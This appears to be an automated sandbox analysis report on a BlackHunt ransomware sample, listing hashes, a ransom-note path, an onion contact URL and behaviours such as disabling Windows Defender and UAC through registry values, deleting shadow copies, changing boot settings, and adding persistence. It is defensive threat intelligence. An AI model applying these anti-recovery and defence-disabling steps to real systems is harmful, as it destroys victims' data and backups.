Analysis
-
max time kernel
173s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:58
Static task
static1
Behavioral task
behavioral1
Sample
d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe
Resource
win10v2004-20231215-en
General
-
Target
d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe
-
Size
707KB
-
MD5
869118cbce9d3d72b3ae95148cfaad7f
-
SHA1
f125a1fc39aedbc9ae7a8f1106e48df97ba30a13
-
SHA256
d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835
-
SHA512
26302f465a3e896b37e38494609de128e43c7eb8bdd39da226fca510276afdb1d0ec7cb829538c0cddf0ef1fad90281d023eaab177e26932f62251d162fe3d78
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1B8ivnh:6uaTmkZJ+naie5OTamgEoKxLW8sh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4952 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5332 bcdedit.exe 5172 bcdedit.exe -
Renames multiple (521) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5856 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\J: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\O: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\L: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\X: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\Y: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\T: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\S: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\W: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\V: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\G: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\M: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\N: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\K: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\I: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\A: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\R: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\Z: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\B: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\Q: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened (read-only) \??\P: d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\icu.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libffi.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightRegular.ttf d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Uninstall Information\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11wrapper.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxslt.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.properties.src d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\lcms.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightDemiBold.ttf d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fontconfig.bfc d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy.jar d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_ReadMe.hta d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File created C:\Program Files\dotnet\#BlackHunt_Private.key d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5328 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5728 vssadmin.exe 6016 vssadmin.exe 5500 vssadmin.exe 5152 vssadmin.exe 5348 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeRestorePrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeBackupPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeTakeOwnershipPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeAuditPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeSecurityPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeIncBasePriorityPrivilege 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Token: SeBackupPrivilege 6092 vssvc.exe Token: SeRestorePrivilege 6092 vssvc.exe Token: SeAuditPrivilege 6092 vssvc.exe Token: SeBackupPrivilege 5880 wbengine.exe Token: SeRestorePrivilege 5880 wbengine.exe Token: SeSecurityPrivilege 5880 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 644 wrote to memory of 2544 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 90 PID 644 wrote to memory of 2544 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 90 PID 644 wrote to memory of 4808 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 92 PID 644 wrote to memory of 4808 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 92 PID 644 wrote to memory of 1828 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 94 PID 644 wrote to memory of 1828 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 94 PID 644 wrote to memory of 3340 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 96 PID 644 wrote to memory of 3340 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 96 PID 644 wrote to memory of 4180 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 184 PID 644 wrote to memory of 4180 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 184 PID 2544 wrote to memory of 4268 2544 cmd.exe 98 PID 2544 wrote to memory of 4268 2544 cmd.exe 98 PID 4180 wrote to memory of 2808 4180 reg.exe 104 PID 4180 wrote to memory of 2808 4180 reg.exe 104 PID 644 wrote to memory of 1684 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 105 PID 644 wrote to memory of 1684 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 105 PID 644 wrote to memory of 4072 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 107 PID 644 wrote to memory of 4072 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 107 PID 3340 wrote to memory of 3240 3340 cmd.exe 101 PID 3340 wrote to memory of 3240 3340 cmd.exe 101 PID 1828 wrote to memory of 4752 1828 cmd.exe 102 PID 1828 wrote to memory of 4752 1828 cmd.exe 102 PID 4808 wrote to memory of 3584 4808 cmd.exe 103 PID 4808 wrote to memory of 3584 4808 cmd.exe 103 PID 644 wrote to memory of 1300 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 123 PID 644 wrote to memory of 1300 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 123 PID 644 wrote to memory of 3428 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 109 PID 644 wrote to memory of 3428 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 109 PID 644 wrote to memory of 2944 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 111 PID 644 wrote to memory of 2944 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 111 PID 644 wrote to memory of 4476 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 110 PID 644 wrote to memory of 4476 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 110 PID 644 wrote to memory of 1676 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 122 PID 644 wrote to memory of 1676 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 122 PID 644 wrote to memory of 876 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 119 PID 644 wrote to memory of 876 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 119 PID 644 wrote to memory of 100 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 116 PID 644 wrote to memory of 100 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 116 PID 644 wrote to memory of 4728 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 121 PID 644 wrote to memory of 4728 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 121 PID 644 wrote to memory of 5028 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 128 PID 644 wrote to memory of 5028 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 128 PID 644 wrote to memory of 3220 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 126 PID 644 wrote to memory of 3220 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 126 PID 644 wrote to memory of 368 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 130 PID 644 wrote to memory of 368 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 130 PID 644 wrote to memory of 3344 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 132 PID 644 wrote to memory of 3344 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 132 PID 644 wrote to memory of 1196 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 131 PID 644 wrote to memory of 1196 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 131 PID 644 wrote to memory of 3456 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 141 PID 644 wrote to memory of 3456 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 141 PID 644 wrote to memory of 2696 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 136 PID 644 wrote to memory of 2696 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 136 PID 644 wrote to memory of 1020 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 138 PID 644 wrote to memory of 1020 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 138 PID 644 wrote to memory of 2948 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 139 PID 644 wrote to memory of 2948 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 139 PID 644 wrote to memory of 1484 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 144 PID 644 wrote to memory of 1484 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 144 PID 644 wrote to memory of 4312 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 146 PID 644 wrote to memory of 4312 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 146 PID 644 wrote to memory of 4328 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 145 PID 644 wrote to memory of 4328 644 d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe 145 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System d09b5774bd21a00e28ee533c2e3de6848f9d43d2fbddecf5c52b232a6cd12835.exe -
Uses Task Scheduler COM API 1 TTPs
